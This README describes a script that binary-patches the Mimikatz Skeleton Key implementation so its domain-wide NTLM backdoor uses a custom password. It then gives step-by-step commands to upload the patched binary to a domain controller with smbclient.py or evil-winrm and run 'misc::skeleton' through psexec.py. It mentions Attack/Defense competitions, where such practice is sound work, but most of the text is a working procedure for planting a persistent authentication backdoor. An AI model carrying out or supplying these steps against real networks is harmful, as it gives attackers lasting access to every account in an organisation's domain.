Binary patching the Mimikatz implementation¹ of the Skeleton Key² exploit to update the global NTLM backdoor hash.

The Skeleton Key malware technique has existed for over a decade (Feng, Be'ery, and McIntyre 2015), but the standard implementation from Mimikatz creates the backdoor utilizing a particularly weak password (mimikatz) and does not support swapping out the hash of this default password with a custom or more secure one.

The hardcoded hash makes it impossible to use defensively in Attack/Defense scenarios and in general is just distastefully immutable. We solve this with a simple binary patching solution to swap out the two instances of the default NTLM hash (60ba4fcadc466c7a033c178194c03df6) with the hash of a user-supplied password.

1. Clone this repository locally

git clone https://github.com/GoldenStack/skeleton-key

2. Download the latest Mimikatz release and unzip it

wget https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip && unzip mimikatz_trunk.zip

3. Run skeleton_patcher.py on the correct (likely x86) Mimikatz binary to patch it

python3 skeleton_patcher.py backdoor_password x86/mimikatz.exe x86/mimikatz_patch.exe

4. Upload the Mimikatz binary to the target DC

smbclient.py DC/Administrator:PASSWORD@IP
> use C$
> cd C:\Users\Administrator\Desktop
> put x86/mimikatz_patch.exe

Alternatively, you can use evil-winrm:

evil-winrm -i <DC> -u Administrator -p <PASSWORD>
> upload x86/mimikatz_patch.exe

5. Connect to the DC and run the Skeleton Key

psexec.py DC/Administrator:PASSWORD@IP
> cd C:\Users\Administrator\Desktop
> mimikatz_patch.exe
> misc::skeleton

Note that we use evil-winrm to upload and psexec.py to run because evil-winrm supports easy-to-use upload functionality, but does not function correctly with Mimikatz.